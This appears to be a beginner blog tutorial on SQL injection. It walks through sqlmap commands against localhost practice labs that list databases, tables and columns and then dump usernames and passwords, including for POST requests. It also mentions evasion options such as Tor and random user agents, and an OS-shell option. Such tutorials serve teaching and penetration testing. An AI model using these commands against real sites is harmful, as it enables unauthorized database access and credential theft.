What is SQL Injection? SQL injection tutorial for beginners - Fully Explained

 

What is SQLI ?   SQL Injection is a code injection technique where an attacker executes malicious SQL queries that control a web application’s database.   What is SQLMAP ?   SQLMAP  is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

So, can say: sqlmap – automatic SQL injection tool   Let's know SQLMAP Options we can use , then we will see practical sql injection using sqlmap   -u URL or -url=URL Target URL (e.g. “http://www.site.com/vuln.php?id=1”) -g GOOGLEDORK ⇒ Process Google dork results as target URLs Request:These options can be used to specify how to connect to the target URL -data=DATA         Data string to be sent through POST –cookie=COOKIE     HTTP Cookie header value –random-agent      Use randomly selected HTTP User-Agent header value –proxy=PROXY       Use a proxy to connect to the target URL –tor               Use Tor anonymity network –check-tor         Check to see if Tor is used properly   Seriously talking, there are lots of lots of useful SQLMAP Options, so now let's see practical, and then we can learn to use SQLMAP options practically   PRACTICAL SQLMAP Target : https://www.zixem.altervista.org/SQLi/level1.php?id=1 This is GET Parameter : id=1 Get Database Details : - -dbs : extract the database names Command : sqlmap -u "http://localhost/Less-4/?id=1" --dbs

So, we got so many database: our choice which we extract further details is on security database Get Table details using: - -tables command and use database now as -D command sqlmap -u "http://localhost/Less-4/?id=1" -D security --tables

So, we got tables details of security database ,our useful data to need to check is : users table Now, extract columns of table users : using : - -columns and as the same way we use -D for the database, now we need to use -T for table sqlmap -u "http://localhost/Less-4/?id=1" -D security -T users --columns

Now, after getting columns detail, we need to check details of useful like username, password Dump Data : using : - -dump payload with -D with -T with -C sqlmap -u "http://localhost/Less-4/?id=1" -D security -T users -C username,password --dump

So, we got all the details using sqlmap   But , sqlmap has more features. so far we have tried sqlmap for GET Parameter.  If you want to use sqlmap for POST Parameter then follow below guide     SQLMAP using POST Parameter

U see there is a username and password field form Now, enter aakash in username field + aakash in password field and observe HTTP Requests NOTE : we can use BURPSUITE for this but this time I am using Developer Tools

Request Payload : uname=aakash&passwd=aakash&submit=Submit Now , SQLMAP Command for POST ⇒ - -data for POST sqlmap -u "http://localhost/Less-12/" --data="uname=aakash&passwd=aakash&submit=Submit" --dbs

So, we can follow the same things as we did with GET Parameter, only changes with POST Parameter is use - -data option   NOTE: YOU can also use -r option instead of - -data option for POST Request in SQLMAP

HOW ?   Let's do this :   Step 1 : in Network Console : Use Copy : Copy Request Headers

Step 2 : paste that request in file : what-evername-u-chose.txt Step 3 : Now also copy Request Payload + save in same file

Step 4 : use sqlmap option -r

See, its so easy

NOTE:   You can save file using BURPSUITE too  But i showed you using Developer Tool too ⇒ which is very useful during your testing   REMEMBER:   There are too many options in sqlmap, and some more useful are : -p : parameter -technique=B [Blind] -string=" anything here" -os-shell**

Thanks for reading To Your Success, Aman yadav #sql #sqlserver #sqlite #sqlab #sqldeveloper #sqlmap #sqlinjection #sqlimercontest #sqldatabase #sqlserver2017 #sqlimer #sqlimerbymay #sqlatinoamerica #sqlatino #sqlserveronlinux #sqlserver2014 #sqltraining #sqlserver2012 #sqlsatvienna #sqlsaturday2017 #sqlsaturday #sqlrun #sqlyog #sqlpass #sqlmanager #sqlmanagementstudio #sqlmagazine #sqllearning #sqlite3 #sqlinternals #amansays